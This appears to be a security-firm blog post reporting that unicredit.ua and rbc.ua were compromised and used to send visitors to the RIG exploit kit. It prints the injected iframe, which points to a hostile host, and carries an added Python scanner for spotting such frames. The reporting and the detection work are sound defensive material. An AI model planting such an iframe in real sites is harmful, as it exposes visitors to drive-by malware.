The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. This exploit does not trigger every time the site is loaded, so there must be some logic that controls the schedule of when the malware redirection occurs.
Here is the full infection chain:
In this case malvertising was not involved; instead the site itself was compromised, with the following iframe injected into its pages:
<iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>
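An added defensive check, not code from the original post or from Cyphort: a small Python scanner that flags off-site iframes with tiny dimensions like the one above, run here against a constructed page snippet. The 150 px size threshold and the same-site hostname rule are assumptions chosen for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a page on unicredit.ua carrying the injected iframe
# reported in the post, plus a benign same-site iframe for contrast.
SAMPLE_HTML = """
<html><body>
<h1>UniCredit Bank</h1>
<iframe src="https://www.unicredit.ua/rates/widget" width="600" height="400"></iframe>
<iframe src="http://oggy.co/wkap.php" width="101" height="102"></iframe>
</body></html>
"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def _small(value, limit=150):
    """True when a width/height attribute is a number at or below limit (assumed threshold)."""
    try:
        return int(str(value).rstrip("px")) <= limit
    except ValueError:
        return False


def find_suspicious_iframes(html, page_host):
    """Return src values of iframes that point off-site and are small enough to go unnoticed."""
    parser = IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        # Same-site check: the page host itself or any subdomain of it.
        off_site = bool(host) and not (host == page_host or host.endswith("." + page_host))
        tiny = _small(attrs.get("width", "")) and _small(attrs.get("height", ""))
        if off_site and tiny:
            hits.append(src)
    return hits


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_HTML, "unicredit.ua"):
        print("suspicious off-site iframe:", src)
```

The same scan can be run over periodic fetches of a site's landing page to catch an injection that, as noted above, is only served some of the time.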
We reached out to UniCredit to notify them of this attack, but have not heard back so far.
Interestingly, this is not the only attack on a prominent Ukrainian website this week. We have seen the same attack, likely by the same group, on another high-profile Ukrainian news site, rbc.ua, two days ago on Jul 13 at 09:31 UTC.
RBC stands for RosBusinessConsulting, a large media group listed on the Russian stock exchange as RBCM. It has more than 1500 employees and revenue of $81 million. Here is the RBC.ua infection chain:
The RIG exploit kit was also used in the RBC.ua compromise. RIG is a popular exploit kit that has been around for about a year and is sold on various “underground” forums. See the screenshot below (from http://www.malwaretech.com/).
Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.